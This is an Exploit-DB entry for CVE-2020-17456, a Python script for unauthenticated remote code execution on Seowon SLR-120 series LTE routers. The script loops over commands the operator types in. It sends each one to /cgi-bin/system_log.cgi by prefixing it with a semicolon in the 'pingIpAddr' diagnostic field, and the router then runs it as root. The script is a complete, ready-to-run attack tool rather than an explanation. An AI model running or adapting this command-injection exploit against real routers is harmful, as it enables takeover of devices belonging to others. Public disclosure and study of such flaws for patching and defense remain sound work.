Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)

EDB-ID:

50821

CVE:

2020-17456

EDB Verified:

Author:

Aryan Chehreghani

Type:

remote

Exploit:   /  

Platform:

Hardware

Date:

2022-03-11

Vulnerable App: 
# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
# Date: 2022-03-11
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30
# Version: All version
# Tested on: Windows 10 Enterprise x64 , Linux
# CVE : CVE-2020-17456

# [ About - Seowon SLR-120 router ]:

#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,
#The convenience of sharing wireless internet access invigorates your lifestyle, families,
#friends and workmates. Carry it around to boost your active communication anywhere.

# [ Description ]:

#Execute commands without authentication as admin user ,
#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.

# [ Vulnerable products ]:

#SLR-120S42G
#SLR-120D42G
#SLR-120T42G

import requests

print ('''
###########################################################                                         
#    Seowon SLR-120S42G router - RCE (Unauthenticated)    #
#                  BY:Aryan Chehreghani                   #
#        Team:TAPESH DIGITAL SECURITY TEAM IRAN           #
#             mail:aryanchehreghani@yahoo.com              #  
#                 -+-USE:python script.py                 #
#         Example Target : http://192.168.1.1:443/        #
###########################################################
''')

url = input ("=> Enter Target : ")

while(True):

    try:
    
        cmd = input ("~Enter Command $ ")
        
        header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "207",
"Origin": "http://192.168.1.1",
"Connection": "close",
"Referer": "http://192.168.1.1/",
"Upgrade-Insecure-Requests": "1"
}

        datas = {
'Command':'Diagnostic',
'traceMode':'ping',
'reportIpOnly':'',
'pingIpAddr':';'+cmd,
'pingPktSize':'56',
'pingTimeout':'30',
'pingCount':'4',
'maxTTLCnt':'30',
'queriesCnt':'3',
'reportIpOnlyCheckbox':'on',
'logarea':'com.cgi',
'btnApply':'Apply',
'T':'1646950471018'
}

        x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)

        print(x.text)

    except:
        break
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services